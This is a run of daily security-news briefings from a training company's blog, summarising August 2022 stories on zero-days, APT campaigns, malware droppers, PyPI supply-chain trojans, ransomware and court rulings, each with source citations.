Ilascu, Ionut, Google blocks largest HTTPS DDoS attack 'reported to date', Bleeping Computer, 18 August 2022. Available online at https://www.bleepingcomputer.com/news/security/google-blocks-largest-https-ddos-attack-reported-to-date/.

Prisoner Details Leaked by Misdirected Email

The Western Australian Department of Justice has had to apologise after sensitive details - full names, an image, date of birth and information about partners - of two prisoners were accidentally sent to the wrong distribution list.

The error occurred when an employee was trying to organize approval for an inter-prison phone call between family members, but picked the wrong list.

This kind of error happens frequently - one memorable case occurred when an employee of a major retail chain sent out a large spreadsheet containing details of gift cards to everyone who had purchased one of the gift cards. Unsurprisingly, a few of the recipients, having obtained details of so many tokens, took the opportunity to use them. If ever there was an argument for the use of groupware or - better still - automated workflows for approval processes, this is it.

Fiore, Briana, Department of Justice apologises over leak of 'sensitive' WA prisoner details, ABC News, 18 August 2022. Available online at https://www.abc.net.au/news/2022-08-18/department-of-justice-wa-apology-prisoner-information-leak/101346460.

Apple Releases Safari 15.6.1 to Fix Zero-Day Exploit

A buffer overflow vulnerability in the WebKit core of Apple's Safari browser has been sighted as an exploit in the wild, leading the company to release an update for their browser. Like other buffer overflows, this vuln could be used to crash the browser, corrupt data or even permit remote code execution.

Abrams, Lawrence, Apple releases Safari 15.6.1 to fix zero-day bug used in attacks, Bleeping Computer, 18 August 2022. Available online at https://www.bleepingcomputer.com/news/security/apple-releases-safari-1561-to-fix-zero-day-bug-used-in-attacks/.

Deep Analysis of APT 41, Winnti/Wicked Spider

Singapore-based security firm Group-IB has released a detailed report on the activities of the Chinese-backed threat actor APT 41, also known as Winnti or Wicked Spider. During 2021, APT 41 were very busy, hitting a total of 80 different private and public sector enterprises and using novel techniques to deploy its customized Cobalt Strike toolkit, perhaps to evade detection. They encoded the main binary into Base64, which was then broken up into chunks of 775 or 1,024 characters, then appended to a text file and directed at the victim using an SQL injection attack.

Using this technique, the attackers were only able to achieve success about half the time, suggesting they are more interested in victim quantity than quality. It seems that APT 41 may be a coalition of smaller groups, as they use a wide variety of tools after initial compromise and mix cyber-espionage activities with financial cybercrime.

Rostovstev, Nikita, APT41 World Tour 2021 on a tight schedule, Group-IB, 18 August 2022. Available online at https://blog.group-ib.com/apt41-world-tour-2021.

Janet Jackson Awarded CVE-2022-38392 for 'Rhythm Nation'

An interesting twist on malware variants than can cross air gaps: playing the Janet Jackson music video, Rhythm Nation, on one laptop can cause another nearby laptop to crash, as well as crashing the first computer. The vulnerability, discovered by a computer manufacturer in the Windows XP era, was found - after some serious research - to be due to the music audio matching a natural resonant frequency of the 5400 RPM disk drives used by that, and other, laptop manufacturers, and was fixed by adding a custom filter to block that part of the audio spectrum from reaching the speakers.

Urban myth? Perhaps, but nonetheless, MITRE has awarded it CVE-2022-3872.

Chen, Raymond, Janet Jackson had the power to crash laptop computers, Microsoft 'The Old New Thing' blog, 16 August 2022. Available online at https://devblogs.microsoft.com/oldnewthing/20220816-00/?p=106994.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Google Wins One, Loses One

Last year, the Australian Competition and Consumer Commission has found that Google breached Australian consumer law during 2017 and 2018 by telling Android users that the only Google account setting that they needed to change in order to stop the search giant collecting PII location data was the 'Location History' setting. Unfortunately, another Google account setting, 'Web & App Activity' also needed to be turned off - it was turned on by default.

Now the Federal Court has ordered Google to pay $60 million in penalties for this breach. Fortunately for Google, the offence occurred before the maximum penalty for breaches of Australian consumer law was increased - from November 2018 it was increased to the higher of $10 million, three times the benefit obtained from the alleged conduct or otherwise, 10% of turnover.

On the other hand, in an appeal to the High Court, Google's argument that a search engine is not a publisher was successful. The High Court overturned two previous rulings that Google was a publisher and by refusing to take down a link, was guilty of defaming a Melbourne lawyer. Google's argument was that a hyperlink only communicates that something exists or where it exists, and that it is the operator of the web page who communicates the content to the user. In a majority ruling, the High Court agreed: "The provision of a hyperlink in the Search Result merely facilitated access to the ... article and was not an act of participation in the bilateral process of communicating the the contents of that article to a third party".

ACCC Media Team, Google LLC to pay $60 million for misleading representations, media release, 12 August 2022. Available online at https://www.accc.gov.au/media-release/google-llc-to-pay-60-million-for-misleading-representations.

Byrne, Elizabeth, High Court finds Google is not a publisher in crucial win for search engine, ABC News, 17 August 2022. Available online at https://www.abc.net.au/news/2022-08-17/high-court-decision-google-not-publisher-george-defteros/101340622.

Secure Boot Loader Causes More Problems

We previously wrote about problems with the Windows secure boot process being subverted by some vendors' code. Unfortunately, it seems the cure is worse than the disease, for some users at least.

Last week's patch, KB5012170, added the signatures of the vendors' files to the Secure Boot Forbidden Signature database, which contains the UEFI revocation list. However, systems which do not have a valid bootloader will generate a 0x800f0922 error and fail to install the patch - fortunate for the user, as the system would not boot if the patch was applied.

Other users are reporting that after the patch is applied, Windows 11 PC's are booting to a BitLocker recovery screen - not a problem if the user has the recovery key, but unfortunately they almost never do. In well-managed environments, a domain administrator can recover the key from Active Directory Domain Services.

Windows 10 users are reporting other problems - slow boot times or their RAID mode being changed to AHCI in the firmware settings, triggering a Blue Screen of Death.

Speed, Richard, Microsoft's Secure Boot fix sends some PCs into BitLocker Recovery, The Register 15 August 2022. Available online at https://www.theregister.com/2022/08/15/bitlocker_microsoft/.

Millions of Realtek-based Network Devices Vulnerable

Researchers from Argentinian company Faraday Security have demonstrated proof-of-concept code to exploit a vulnerability they have discovered in the Realtek RTL819x system-on-a-chip (SOC). This chip is used in millions of networking devices such as routers.

Ilascu, Ionut, Exploit out for critical Realtek flaw affecting many networking devices, Bleeping Computer, 16 August 2022. Available online at https://www.bleepingcomputer.com/news/security/exploit-out-for-critical-realtek-flaw-affecting-many-networking-devices/.

Equifax Fallout Continues; SEC Charges Three

We have written previously about security governance requirements, and in particular the guidance issued by the SEC in February 2018, which seemed to have been triggered by their investigations of the infamous Equifax breach. The same incident continues to have repercussions, this time for a finance manager who worked at the public relations firm engaged by Equifax to assist with the breach, as well as her husband and his brother. The SEC alleges that upon learning of the breach, Ann M. Dishinger tipped off her husband, who arranged with a former business client to buy put options on Equifax on the understanding that they would split any profits realized. The SEC also alleges that he also helped his brother set up a similar arrangement with an old high school friend. These arrangements allegedly netted approximately $US108,000 in profits, split between the participants.

U.S. Securities and Exchange Commission, SEC Charges Three Chicago-Area Residents with Insider Trading Around Equifax Data Breach Announcement, Litigation Releast No. 25470, 16 August 2022. Available online at https://www.sec.gov/litigation/litreleases/2022/lr25470.htm.

Chrome Zero-Day In The Wild

A vulnerability in the Chrome desktop browser, first publicly disclosed by Google Threat Analysis Group in July, now has an exploit circulating in the wild. CVE-2022-2856 is a case of insufficient validation of user input, and has Google has responded by pushing out an update, which also fixes ten other security flaws, mostly relating to free-after-use bugs in Chrome components.

Lakshamanan, Ravie, New Google Chrome Zero-Day Vulnerability Being Exploited in the Wild, The Hacker News, 18 August 2022. Available online at https://thehackernews.com/2022/08/new-google-chrome-zero-day.html.

Trojan Dropper Lives On, Thanks to Anti-Forensics

Researchers from Secureworks have done a deep analysis on a sophisticated trojan dropper called DarkTortilla which has been circulating since 2015, yet manages to still spread widely, dropping malware on behalf of a wide range of threat actors, due to its complex anti-forensics techniques.

DarkTortilla usually activates via targeted malmails containing infected attachments, often zip files and other archives, or ISO images. When the user double-clicks to open the contained document, they actually run the DarkTortilla initial loader. From there, the core component goes to work, but what it does is highly configurable, with the configuration controlled by bitmap images. It will typically check to see if it is running in a virtual machine or sandbox, set up registry keys so it can persist, migrate itself to the Windows %TEMP% directory, process any add-on files, and switch execution environment to its install directly. Once this is done, it injects and executes its main payload, taking additional steps to prevent interference with its various components.

Different threat actors will use DarkTortilla to deliver any of several different payloads - usually remote access trojans such as AgentTesla, NanoCore and AsyncRat, but also keystroke loggers and toolkits such as Metasploit and Cobalt Strike. Occasionally, it will deliver ransomware.

It is easy to see why this trojan dropper has lived so long - it's incredibly versatile and valuable to threat actors, and its sophisticated anti-forensics and configurability represent a considerable investment which is worth maintaining.

Counter Threat Unit Research Team, DarkTortilla Malware Analysis, Secureworks, 17 August 2022. Available online at https://www.secureworks.com/research/darktortilla-malware-analysis.

Lazarus Group Chases Crypto Via Job Seekers

North Korean threat groups notoriously pursue hard currency and crypto assets in an attempt to bypass sanctions, and Lazarus Group has recently been discovered targeting fintech job seekers using an infected PDF containing information about a job opening at exchange operator Coinbase.

While initial attacks infected Windows machines only, the latest variant also targets Mac users, with a malware payload signed with a certificate issued by Apple and possibly revoked by now.

Ilascu, Ionut, North Korean hackers use signed macOS malware to target IT job seekers, Bleeping Computer, 17 August 2022. Available online at https://www.bleepingcomputer.com/news/security/north-korean-hackers-use-signed-macos-malware-to-target-it-job-seekers/.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

(ISC)2 Election Process Criticised

As mentioned in a previous news brief, the election for the Board of Directors at (ISC)² continues to draw criticism from members. In a post to the (ISC)² Community discussion board, member Stephen Mencik, along with Wim Remes and Diana Contesti, point out some glaring flaws in the process:

• The Board apparently changed the process for nomination after the election was announced.
• This change was not announced to the membership.
• Nevertheless 85 people submitted nominations to run, but
  
• The Board reviewed these nominations, and then selected five candidates to run for the five open seats.

In effect, says Mencik, this means that the Board decided the election result with no reference to the membership. Concerned certification holders (are we really members?) might want to have their say.

Mencik, Stephen, post in thread "Petition to be on the ballot for the 2022 ISC2 Board of Directors Election", (ISC)2 Community discussion board, 16 August 2022. Available online at https://community.isc2.org/t5/Welcome/Petition-to-be-on-the-Ballot-for-the-2022-ISC2-Board-of/m-p/52476/highlight/true#M2084.

Ransomware Operators Hit UK Water Supplier

A ransomware group known as Clop claimed to have hit the largest UK water supplier, Thames Water. In response Thames Water issued a statement via its website stating that it had not suffered a cyber-attack, and instead South Staffordshire PLC, operator of South Staffs Water and Cambridge Water, confirmed that it had been the victim of the attack. The company revealed that its corporate network had been affected, but that its water supply operations were not compromised.

Despite Clop's misfire, this is continuing evidence that ransomware gangs are keen to exploit critical infrastructure operations, further eroding resilience at a time of drought and water shortages.

Montalbano, Elizabeth, U.K. Water Supplier Hit with Clop Ransomware Attack, ThreatPost, 16 August 2022. Available online at https://threatpost.com/water-supplier-hit-clop-ransomware/180422/.

PyPI Supply-Chain Attacks - Python Packages Target Discord, Roblox

Kaspersky, Snyk and Checkpoint have found multiple trojaned Python packages in PyPI, the Python Package Index repository. The trojan code uses a variety of techniques; for example, a package examined by Checkpoint used code in the _init_.py file of the setup script to download and run a script which would search for and exfiltrate local passwords.

The latest discoveries include 12 distinct pieces of malware belonging to the same actor, and uses PyInstaller to bundle a malicious application and its dependencies into one package which is then distributed via the Discord content delivery network, from where it infiltrates user browsers. It then exfiltrates passwords, cookies, web history and other data which the attackers can use to pivot to other targets using the stolen credentials.

The references below provide a lot of technical detail, but the overall message is that even more effort is required in the area of supply chain security.

Bezcershenko, Leonid and Igor Kuznetsov, Two more malicious Python packages in the PyPI, Kaspersky SecureList, 16 August 2022. Available online at https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/.

Suero, Kyle and Raul Onitza-Klugman, Snyk finds PyPI malware that steals Discord and Roblox credential and payment info, Snyk blog, 16 August 2022. Available online at https://snyk.io/blog/pypi-malware-discord-roblox-credential-payment-info/.

Uncredited, CloudGuard Spectral detects several malicious packages on PyPI - the official software repository for Python developers, Checkpoint Research, 8 August 2022. Available online at https://research.checkpoint.com/2022/cloudguard-spectral-detects-several-malicious-packages-on-pypi-the-official-software-repository-for-python-developers/.

Another Hardware Vulnerability in AMD processors

In another brief, we mentioned the ÆPIC vulnerability which affects Intel's SGX security architecture. Now comes news of yet another hardware vulnerability, CVE-2021-46778, which impacts AMD Zen 1, Zen 2 and Zen 3 architecture processors. The SQUIP (Scheduler Queue Usage via Interference Probing) attack is a side channel attack that threat actors could use to recover RSA keys. AMD has issued a bulletin, but no easy fix is available.

Gast, Stefan, et. al., SQUIIP: Exploiting the Scheduler Queue Contention Side Channel, preprint, August 2022. Available online at https://stefangast.eu/papers/squip.pdf.

Uncredited, Execution Unit Scheduler Contention Side-Channel Vulnerability on AMD Processors, AMD product security bulletin, 12 August 2022. Available online at https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1039.

Russian APT Phishes Defence, Intelligence, Academics

Microsoft has been tracking an espionage campaign it labels SEABORGIUM, apparently involving an APT variously known as Callisto, COLDRIVER and TA446. The campaign targets defence and intelligence consulting firms, thinktanks and academics, primarily in the US, UK, Nordic and Baltic states, and Eastern Europe, using phishing and credential theft techniques.

The campaign is highly targeted, using fake personas on social media to send innocuous emails and establish trust before sending a weaponized message containing or linking to a trojaned PDF file, which is hosted on Microsoft OneDrive.

Lakshamanan, Ravie, Microsoft Warns About Phishing Attacks by Russia-linked Hackers, The Hacker News, 16 August 2022. Available online at https://thehackernews.com/2022/08/microsoft-warns-about-phishing-attacks.html.

Aussie Roots Tractor

Continuing the Right-To-Repair debate, an Asia-based Australian security researcher showed DEFCON attendees how to get privileged access to the CANBUS display of a John Deere 4240 tractor. John Deere is much criticised for blocking access to their tractors' control systems, making repairs possible only via authorised dealers. It took researcher SickCodes a lot of expensive experimentation to finally break the Linux-based display, but in the end it was embarrassingly easy: he simply created an empty file called dealerAuth.txt on a USB memory stick inserted into the system.

Saarinen, Juha, Oh Deere: Aussie researcher roots tractor control system, IT News, 16 August 2022. Available online at https://www.itnews.com.au/news/oh-deere-aussie-researcher-roots-tractor-control-system-584004.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.